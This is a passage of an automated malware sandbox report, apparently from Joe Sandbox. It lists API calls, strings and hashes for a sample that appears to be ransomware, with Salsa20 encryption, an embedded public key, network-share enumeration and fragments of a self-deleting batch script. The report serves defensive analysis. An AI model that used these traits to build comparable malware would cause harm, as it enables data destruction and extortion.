                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • _malloc.LIBCMT ref: 002EEF85
                                                                                                                                                                        • _memset.LIBCMT ref: 002EEF9B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$AllocateHeap_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3655941445-0
                                                                                                                                                                        • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                                        • Instruction ID: 5726f822d8a6f3cf867aecdd3e7ca01e77d0184bde5d2266556ce10575bb0079
                                                                                                                                                                        • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C11A031500624AFCB10DFA8C881B5ABBB5FF8A310F6541A8E9489F396D631A912CB81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00303B64
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00303B82
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00303B97
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3074076210-0
                                                                                                                                                                        • Opcode ID: c57e02fc5bdd825949673d1f604781b346195fd082f3b09fec6ab5e3d441bf09
                                                                                                                                                                        • Instruction ID: 9c66251cb67926c1cc0e03c83b9515dd81592625e7105c79d31ef354e1e6bb63
                                                                                                                                                                        • Opcode Fuzzy Hash: c57e02fc5bdd825949673d1f604781b346195fd082f3b09fec6ab5e3d441bf09
                                                                                                                                                                        • Instruction Fuzzy Hash: 0CF0283550120D66CF0BAAE8EC66EEEB7ACDF05354F104465FC14AA1C2DFF19A8082D4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00334AE0: GetStdHandle.KERNEL32(000000F4,00334C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0033480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00331D37,00000000,002ECDAE,00000001,00000001), ref: 00334AFA
                                                                                                                                                                          • Part of subcall function 00334AE0: GetFileType.KERNEL32(00000000), ref: 00334B05
                                                                                                                                                                          • Part of subcall function 00334AE0: __vfwprintf_p.LIBCMT ref: 00334B27
                                                                                                                                                                        • _raise.LIBCMT ref: 00334C18
                                                                                                                                                                          • Part of subcall function 0030A12E: __getptd_noexit.LIBCMT ref: 0030A16B
                                                                                                                                                                          • Part of subcall function 00307CEC: _doexit.LIBCMT ref: 00307CF6
                                                                                                                                                                        Strings
                                                                                                                                                                        • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00334C0C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                                                                                        • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                                                                                        • API String ID: 2149077303-4210838268
                                                                                                                                                                        • Opcode ID: 0da791709155dff7194b212f50fee7a1975301956d4c648de84b05b7478b7519
                                                                                                                                                                        • Instruction ID: d952f93d0c2fad39b7dd23393ee676a2ddfadcbc12de8798d0083704f14de550
                                                                                                                                                                        • Opcode Fuzzy Hash: 0da791709155dff7194b212f50fee7a1975301956d4c648de84b05b7478b7519
                                                                                                                                                                        • Instruction Fuzzy Hash: 18D09E79589200BFE9076790AC17A4B7B55AF84714F408424F69A084F2D6729120A757
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2799698630-0
                                                                                                                                                                        • Opcode ID: bfb1fadf7191ab26b11b13fdae4d769fcb6f5179d4eb8dc8a01bfa8843dac7a6
                                                                                                                                                                        • Instruction ID: 93cf018332b3f07c768e5f4dd1b30d77881ac628c2ea05820b9298a2c4ae7d13
                                                                                                                                                                        • Opcode Fuzzy Hash: bfb1fadf7191ab26b11b13fdae4d769fcb6f5179d4eb8dc8a01bfa8843dac7a6
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B51DE70C2029DCAEF61DF60CD457EEBAB5BF11308F4001B9D409A6291EB729AA4CF52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002F18DD
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 002F18E9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFreeHandleVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2443081362-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 002F69DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 120817956-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 002F65C5
                                                                                                                                                                          • Part of subcall function 00303B4C: _malloc.LIBCMT ref: 00303B64
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 657562460-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 002FFA25
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002F0BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 002F0C12
                                                                                                                                                                        • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 002FFDA4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumMessageOpenSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1835186980-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00303B64
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 501242067-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00409230), ref: 002FFDD6
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __fsopen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3646066109-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __wfsopen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 197181222-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,?,?), ref: 002F2966
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7, xrefs: 002F9EC4
                                                                                                                                                                        • p2?, xrefs: 002F9EE2
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7$p2?
                                                                                                                                                                        • API String ID: 2102423945-3049354308
                                                                                                                                                                        • Opcode ID: 71ae469202670da77636b892c9cec395a370c1ce29d4b0bbee565977033f428a
                                                                                                                                                                        • Instruction ID: ec0386afbabe5a5b86fba15233fbb76875e009f852eb8429e05e296c67c010d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 71ae469202670da77636b892c9cec395a370c1ce29d4b0bbee565977033f428a
                                                                                                                                                                        • Instruction Fuzzy Hash: 1BF06D7028974475F3126750FD17B253A91A314B08F500898E2482E2F3D3F92348939E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00318568,?,00000000), ref: 003182E6
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00318568,?,00000000), ref: 00318310
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                        • Opcode ID: 50f1a044e3237078522b77fcd0e1ece8111f6b0c1041fe1f0068709ca449d13c
                                                                                                                                                                        • Instruction ID: 071c8fcc41713f9ff4a711ca6d9a1b18b65b1025d06035e219e097c157fcfde0
                                                                                                                                                                        • Opcode Fuzzy Hash: 50f1a044e3237078522b77fcd0e1ece8111f6b0c1041fe1f0068709ca449d13c
                                                                                                                                                                        • Instruction Fuzzy Hash: A7019235204505AADB2B9F59DC05FDA379CAF09B60F058815F604DB491EF70DAC2C7D8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 002EC090
                                                                                                                                                                        • input != nullptr && output != nullptr, xrefs: 002EC095
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __wassert
                                                                                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                                                                                        • Opcode ID: 0439b6fa353e85df8dd13dda7f14677631e9b0122cbe86f2506bf1754d3f2b27
                                                                                                                                                                        • Instruction ID: 2b6a2675275c68b7565f7523893659c8a5d872ad5c6bb32c5111b5b522a33870
                                                                                                                                                                        • Opcode Fuzzy Hash: 0439b6fa353e85df8dd13dda7f14677631e9b0122cbe86f2506bf1754d3f2b27
                                                                                                                                                                        • Instruction Fuzzy Hash: 1AC18BB5E003499FCB54CFA9C885ADEFBF1FF48300F64856AE919E7201E334AA558B54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 002F24FE
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002F2509
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 002F251C
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 002F2539
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 002F2550
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002F255B
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 002F256E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                        • API String ID: 2372642624-488272950
                                                                                                                                                                        • Opcode ID: a5d686a38457f53882103d277b7409c989cc6dcda0032e1f200d96689da26974
                                                                                                                                                                        • Instruction ID: a08ce6b20836a69c8166f51167dcb2811ea17b3a671f3cf6779ce846e44878b9
                                                                                                                                                                        • Opcode Fuzzy Hash: a5d686a38457f53882103d277b7409c989cc6dcda0032e1f200d96689da26974
                                                                                                                                                                        • Instruction Fuzzy Hash: F471417295021CAADF11DBE1DC89FEA77BCFB45301F4006A6F609D2090DB759A88CF61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002F1915
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 002F1932
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 002F1941
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 002F1948
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 002F1956
                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 002F1962
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 002F1974
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 002F198B
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,003E0260), ref: 002F1993
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 002F1999
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 002F19A3
                                                                                                                                                                        • _memset.LIBCMT ref: 002F19B8
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 002F19DC
                                                                                                                                                                          • Part of subcall function 002F2BA0: lstrlenW.KERNEL32(?), ref: 002F2BC9
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 002F1A01
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 002F1A04
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                                        • String ID: failed with error
                                                                                                                                                                        • API String ID: 4182478520-946485432
                                                                                                                                                                        • Opcode ID: 021016a04837d590a9cdf86677690381e8f8245a1eaec75e4ed402f13be17a58
                                                                                                                                                                        • Instruction ID: 47691937740e0bff275a0a325e30032e823909ffcf22127f452d6458fe11a529
                                                                                                                                                                        • Opcode Fuzzy Hash: 021016a04837d590a9cdf86677690381e8f8245a1eaec75e4ed402f13be17a58
                                                                                                                                                                        • Instruction Fuzzy Hash: 00210431A50218F7E7126BA18C4AFBE7A7CEB86B50F100024FB01B61D0CAB42D519FE5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 003349A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00334B72), ref: 003349C7
                                                                                                                                                                          • Part of subcall function 003349A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 003349D7
                                                                                                                                                                          • Part of subcall function 003349A0: GetDesktopWindow.USER32 ref: 003349FB
                                                                                                                                                                          • Part of subcall function 003349A0: GetProcessWindowStation.USER32(?,00334B72), ref: 00334A01
                                                                                                                                                                          • Part of subcall function 003349A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00334B72), ref: 00334A1C
                                                                                                                                                                          • Part of subcall function 003349A0: GetLastError.KERNEL32(?,00334B72), ref: 00334A2A
                                                                                                                                                                          • Part of subcall function 003349A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00334B72), ref: 00334A65
                                                                                                                                                                          • Part of subcall function 003349A0: _wcsstr.LIBCMT ref: 00334A8A
                                                                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00362316
                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00362323
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00362338
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00362341
                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0036234E
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0036235C
                                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 0036236E
                                                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 003623CA
                                                                                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 003623D6
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00362436
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0036243D
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 0036244A
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00362450
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                                                        • API String ID: 151064509-1805842116
                                                                                                                                                                        • Opcode ID: 4eeedae8e791e2981042005298e0d992fad9a1ff2e47ee14f4a6ccdf886208bf
                                                                                                                                                                        • Instruction ID: 2c91d2dba0356b9be619777cc3d75905eef9dea6222fab3100b3f057a1abedc9
                                                                                                                                                                        • Opcode Fuzzy Hash: 4eeedae8e791e2981042005298e0d992fad9a1ff2e47ee14f4a6ccdf886208bf
                                                                                                                                                                        • Instruction Fuzzy Hash: AF419671544700EBD3229B759C46F6FBBFCFF8AB50F014519FA54962A1DB71D8008BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
